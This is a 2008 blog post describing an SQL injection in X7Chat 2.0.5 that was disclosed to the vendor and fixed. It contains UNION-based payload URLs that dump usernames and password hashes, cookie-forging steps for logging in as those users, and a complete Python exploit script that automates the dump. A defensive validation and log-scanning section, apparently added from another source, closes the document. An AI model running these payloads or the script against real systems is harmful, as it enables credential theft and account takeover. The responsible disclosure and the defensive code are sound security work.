Thursday, January 17, 2008

bug and exploit in X7Chat v 2.0.5

''JANUARY 11-12, 2008''

I was auditing the software, learning how the code is written; it has really improved a lot since the first versions.
I tried the usual: going in through the front door and trying to log in as administrator without having the password, something that looks complicated but often
isn't, but unfortunately I wasn't inspired...

But the second day was different. It occurred to me to look elsewhere, to examine other possibilities, and voilà! the unexpected (or the expected?).
Here is the scoop:

{{{
************************************************************************
************************************************************************

Software: X7 Chat 2.0.5 (x7chat.com)

Author: A nonroot user

Vuln Type: SQL injection

Date:

debian:/var/www/xchat/sources# date -u
sáb ene 12 21:21:23 UTC 2008

X7 Group was informed

************************************************************************
************************************************************************


There is an issue in line 72 of /sources/info_box.php

...

69 $body = "";
70 $mini = $_GET['day'];
71 $maxi = $_GET['day']+86400;
72 $query = $db->DoQuery("SELECT * FROM {$prefix}events WHERE timestamp>$mini AND timestamp<$maxi");
73 while($row = $db->Do_Fetch_Row($query)){
74 $body .= "".date($x7c->settings['date_format_full'],$row[1]).": $row[2]";

75 }
76

...

If the "day" variable is replaced by a SQL injection query, a possible attacker could view the password hashes in the MySQL users table.
Examples:

Got the users: http://vulnhost/xchat_soft/index.php?act=sm_window&page=event&day=1%20UNION%20select%20username,id,username%20from%20x7chat2_us$
Got the hashs: http://vulnhost/xchat_soft/index.php?act=sm_window&page=event&day=1%20UNION%20select%20username,id,password%20from%20x7chat2_u$

Then you can use username and hash passwords in order to login into the X7CHAT, just create 2 cookies:

X7C2U=username
X7C2P=password hash

Who wants to be?


Greetings:

to * AT colombia


************************************************************************
************************************************************************
}}}

Part of it is missing because my screen doesn't fit any more characters, but the advisory will be published once someone from the X7 team confirms it.

Well, I think it's time to switch activities.

bye.

Reply:
{{{
Hello,
Thank you, the vulnerability has been confirmed. A fix is
available here: http://x7chat.com/support_forum/index.php?topic=3287.0
Version 2.0.5.1 has replaced 2.0.5 on the download page, this updated
version contains the fix as well.

Thanks,
Tim
}}}

''' JANUARY 14 '''

Since I'm learning a bit of Python, I tried coding the exploit in Python. Here is the result; I've already tested it and it does work.
Better ways of doing it (coding-wise) are welcome.

{{{
nando@debian:~$ cat xchat_exploit.py
#!/usr/bin/python
#
#Exploit for xchat 2.0.5
#Dumps the users and the hashes
#By nonroot - 2008
#it's a PoC, please use responsibly
#
import string,urllib
import sys,re
print "Target host: i.e: http://127.0.0.1/x7chat/"
host=raw_input("Target host ( include http and /): ")
print "Output file: i.e: salida.txt"
out_file=raw_input("Output file: ")
print "trying ..."
SQL_users="1%20UNION%20select%20username,id,username%20from%20x7chat2_users%20--"
SQL_hashs="1%20UNION%20select%20username,id,password%20from%20x7chat2_users%20--"
link_attack=host+"index.php?act=sm_window&page=event&day="
response = urllib.urlopen(link_attack + SQL_users).read()
findall_users=re.compile("(\w+)\n\n").findall
found_users=findall_users(response)
if len(found_users)==0:
    print "Sorry, exploit failed, please review the SQL string and try to change something like tables or wathever"
    print "Or, there are not users, or x7chat software is version >= 2.0.5.1, so sorry. try to find a new bug ;)"
    sys.exit()
#Find the hashs
response = urllib.urlopen(link_attack + SQL_hashs).read()
findall_hashs=re.compile("(\w+)\n\n").findall
found_hashs=findall_hashs(response)
if len(found_hashs)==0:
    print "Sorry, exploit failed, please review the SQL string and try to change something like tables or wathever"
    print "Or, there are not hashs, or x7chat software is version >= 2.0.5.1, so sorry. try to find a new bug ;)"
    sys.exit()
#Save all this at file
file = open(out_file, "w")
file.write("*********************************************************************\n")
file.write("\n")
file.write("HOST:")
file.write(" ")
file.write(host)
file.write("\n")
file.write("\n")
file.write("USER HASH\n")
file.write("possible admin user: ")
file.write(found_users[0])
file.write(" ")
file.write(found_hashs[0])
file.write("\n")
for i in range(len(found_users)):
    file.write(found_users[i])
    file.write(" ")
    file.write(found_hashs[i])
    file.write("\n")
file.write("\n")
file.write("*********************************************************************\n")
file.close()
print "Successfull, please review the ",out_file," file."
}}}

get the code at: http://www.milw0rm.com/exploits/4907
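As an added defensive example (not code from this post or from X7Chat), the check below does what the vulnerable line 72 should have done, accepting `day` only as a plain integer, and then runs that same check over constructed web-server log lines to flag requests whose `day` parameter carries anything else, such as the UNION strings in the advisory. The endpoint path, the Apache-style log format and the sample lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Assumed vulnerable endpoint: /index.php?act=sm_window&page=event&day=<value>
VULN_QUERY = {"act": "sm_window", "page": "event"}

def safe_day(raw):
    """Server-side rule the fix needs: 'day' must be a plain integer
    (the effect of casting $_GET['day'] to int). Returns int or None."""
    if raw is None or not re.fullmatch(r"-?\d{1,10}", raw.strip()):
        return None
    return int(raw)

def is_suspicious_event_request(path):
    """True when the event window is requested with a non-integer 'day',
    i.e. a value the string-concatenated query would have executed."""
    parts = urlsplit(path)
    if not parts.path.endswith("/index.php"):
        return False
    qs = parse_qs(parts.query, keep_blank_values=True)
    if any(qs.get(k, [None])[0] != v for k, v in VULN_QUERY.items()):
        return False
    day = qs.get("day", [None])[0]
    if day is None:          # no parameter at all: broken request, not injection
        return False
    return safe_day(day) is None

# Apache combined-style line: client, identd, user, [time], "METHOD path proto", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]+" (\d{3})')

def scan_access_log(lines):
    """Return (client_ip, decoded request path) for every suspicious line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path, _status = m.groups()
        if is_suspicious_event_request(path):
            hits.append((ip, unquote_plus(path)))
    return hits

# Constructed sample log lines, not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Jan/2008:21:21:23 +0000] "GET /xchat/index.php?act=sm_window&page=event&day=1200096000 HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Jan/2008:21:22:01 +0000] "GET /xchat/index.php?act=sm_window&page=event&day=1%20UNION%20select%20username,id,password%20from%20x7chat2_users%20-- HTTP/1.1" 200 2210 "-" "Python-urllib/1.17"',
    '10.0.0.9 - - [12/Jan/2008:21:22:05 +0000] "GET /xchat/index.php?act=login HTTP/1.1" 200 412 "-" "Python-urllib/1.17"',
]

if __name__ == "__main__":
    for ip, path in scan_access_log(SAMPLE_LOG):
        print(f"suspicious day= parameter from {ip}: {path}")
```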
------------------------------------
------------------------------------
